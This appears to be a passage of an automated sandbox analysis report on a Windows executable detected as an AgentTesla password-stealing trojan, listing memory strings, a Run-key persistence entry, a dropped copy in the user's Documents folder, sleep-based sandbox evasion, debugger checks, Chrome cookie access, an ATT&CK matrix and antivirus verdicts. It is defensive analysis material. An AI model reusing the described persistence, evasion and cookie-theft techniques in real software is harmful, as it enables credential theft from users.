"%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.288845746.0000000000C10000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.319616320.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000002.567209729.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.335812596.0000000002F90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.288845746.0000000000C10000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.319616320.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000002.567209729.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.335812596.0000000002F90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Mutant created: \Sessions\1\BaseNamedObjects\37238328-1324242-5456786-8fdff0-67547552436675

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Code function: 3_2_00D37919 FindResourceW,LoadResource,LockResource,SizeofResource,FreeResource,

3_2_00D37919

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe

Static file information: File size 1107968 > 1048576

Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Unpacked PE file: 3.2.38b2c7a1af454d382927f81543d86055886bc02863457.exe.ca0000.0.unpack .text:EW;.rdata:W;.data:W;.rsrc:W;.reloc:W;.ask:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:W;.reloc:W;.ask:EW;.adata:EW;
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Unpacked PE file: 4.2.38b2c7a1af454d382927f81543d86055886bc02863457.exe.ca0000.0.unpack .text:EW;.rdata:W;.data:W;.rsrc:W;.reloc:W;.ask:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:W;.reloc:W;.ask:EW;.adata:EW;
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Unpacked PE file: 5.2.38b2c7a1af454d382927f81543d86055886bc02863457.exe.ca0000.0.unpack .text:EW;.rdata:W;.data:W;.rsrc:W;.reloc:W;.ask:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:W;.reloc:W;.ask:EW;.adata:EW;

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 3_2_00F3B00A push ebp; ret	3_2_00F3B00D
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 3_2_00E292F5 push ecx; ret	3_2_00E29308
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 3_2_00E2149E push ecx; ret	3_2_00E214B1
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 3_2_00E266B9 push ecx; ret	3_2_00E266DA
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 4_2_00F3B00A push ebp; ret	4_2_00F3B00D
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 4_2_00E292F5 push ecx; ret	4_2_00E29308
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 4_2_00E2149E push ecx; ret	4_2_00E214B1
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 4_2_00E266B9 push ecx; ret	4_2_00E266DA

Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe	Static PE information: section name: .ask
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe	Static PE information: section name: .adata
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe.3.dr	Static PE information: section name: .ask
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe.3.dr	Static PE information: section name: .adata

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Code function: 3_2_00E73B2F LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_00E73B2F

Source: initial sample

Static PE information: section where entry point is pointing to: .ask

Source: initial sample	Static PE information: section name: .text entropy: 7.999735953883561
Source: initial sample	Static PE information: section name: .text entropy: 7.999735953883561

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

File created: C:\Users\user\Documents\VlcpVideoV1.0.1\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Jump to dropped file

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

File created: C:\Users\user\Documents\VlcpVideoV1.0.1\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Jump to dropped file

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MyStart			Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MyStart			Jump to behavior

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe TID: 4692	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe TID: 5884	Thread sleep count: 494 > 30	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe TID: 5884	Thread sleep time: -36000000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe TID: 5884	Thread sleep count: 563 > 30	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe TID: 5884	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe TID: 2316	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe TID: 1780	Thread sleep count: 544 > 30	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe TID: 1780	Thread sleep count: 655 > 30	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe TID: 1780	Thread sleep count: 736 > 30	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe TID: 1780	Thread sleep time: -54000000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe TID: 764	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe TID: 4596	Thread sleep count: 1730 > 30	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe TID: 4596	Thread sleep count: 387 > 30	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe TID: 4596	Thread sleep count: 553 > 30	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe TID: 4596	Thread sleep count: 367 > 30	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe TID: 4596	Thread sleep time: -54000000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe TID: 4596	Thread sleep count: 160 > 30	Jump to behavior

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_3-19886

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_3-20317

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Thread delayed: delay time: 18000000	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Thread delayed: delay time: 18000000	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Thread delayed: delay time: 18000000	Jump to behavior

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Window / User API: threadDelayed 494	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Window / User API: threadDelayed 563	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Window / User API: threadDelayed 544	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Window / User API: threadDelayed 655	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Window / User API: threadDelayed 736	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Window / User API: threadDelayed 1730	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Window / User API: threadDelayed 387	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Window / User API: threadDelayed 553	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Window / User API: threadDelayed 367	Jump to behavior

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Code function: 4_2_00CFCB30 GetSystemInfo,

4_2_00CFCB30

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Thread delayed: delay time: 18000000	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Thread delayed: delay time: 18000000	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Thread delayed: delay time: 18000000	Jump to behavior

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	API call chain: ExitProcess graph end node			graph_3-20318
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	API call chain: ExitProcess graph end node			graph_4-19566

Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.559498712.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.557985584.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.291001931.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.291106993.0000000000A39000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.290334262.0000000000A37000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Code function: 3_2_00E220D7 IsDebuggerPresent,

3_2_00E220D7

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Code function: 3_2_00E44AB3 RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,

3_2_00E44AB3

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Code function: 3_2_00E73B2F LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_00E73B2F

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Code function: 3_2_00CA2082 GetProcessHeap,

3_2_00CA2082

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 3_2_00E2EC83 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		3_2_00E2EC83
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 4_2_00E2EC83 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		4_2_00E2EC83

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\tmp.edb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d.jfm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d.jfm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d.jfm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d.jfm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d.jfm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d.jfm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d.jfm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d.jfm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d.jfm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\tmp.edb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d.jfm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d.jfm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Queries volume information: C:\Users\user\Desktop\d VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: _raise,IsProcessorFeaturePresent,__call_reportfault,___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_abort,RtlEncodePointer,	3_2_00E4977D
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_00E3C023
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: GetLocaleInfoW,	3_2_00E3C223
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: _raise,IsProcessorFeaturePresent,__call_reportfault,___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	3_2_00E2BA23
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: _raise,IsProcessorFeaturePresent,__call_reportfault,___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_abort,RtlEncodePointer,	4_2_00E4977D
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	4_2_00E3C023
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: GetLocaleInfoW,	4_2_00E3C223
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: _raise,IsProcessorFeaturePresent,__call_reportfault,___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	4_2_00E2BA23

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Code function: 3_2_00E6199F cpuid

3_2_00E6199F

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Code function: 3_2_00E66749 GetSystemTimeAsFileTime,

3_2_00E66749

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Code function: 3_2_00E6BDEE GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,

3_2_00E6BDEE

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Jump to behavior

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 3_2_00E759E3 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,		3_2_00E759E3
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 4_2_00E759E3 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,		4_2_00E759E3

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	3 Native API	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	31 Virtualization/Sandbox Evasion	1 Input Capture	141 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Deobfuscate/Decode Files or Information	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Scheduled Transfer	14 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	13 Software Packing	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	45 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
38b2c7a1af454d382927f81543d86055886bc02863457.exe	64%	Virustotal		Browse
38b2c7a1af454d382927f81543d86055886bc02863457.exe	96%	ReversingLabs	Win32.Trojan.AgentTesla
38b2c7a1af454d382927f81543d86055886bc02863457.exe	100%	Avira	TR/PSW.Agent.hgzdq
38b2c7a1af454d382927f81543d86055886bc02863457.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\Documents\VlcpVideoV1.0.1\38b2c7a1af454d382927f81543d86055886bc02863457.exe	100%	Avira	TR/PSW.Agent.hgzdq
C:\Users\user\Documents\VlcpVideoV1.0.1\38b2c7a1af454d382927f81543d86055886bc02863457.exe	100%	Joe Sandbox ML
C:\Users\user\Documents\VlcpVideoV1.0.1\38b2c7a1af454d382927f81543d86055886bc02863457.exe	96%	ReversingLabs	Win32.Trojan.AgentTesla

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.0.38b2c7a1af454d382927f81543d86055886bc02863457.exe.ca0000.0.unpack	100%	Avira	HEUR/AGEN.1231516	Download File
5.0.38b2c7a1af454d382927f81543d86055886bc02863457.exe.ca0000.0.unpack	100%	Avira	HEUR/AGEN.1231516	Download File
4.0.38b2c7a1af454d382927f81543d86055886bc02863457.exe.ca0000.0.unpack	100%	Avira	HEUR/AGEN.1231516	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
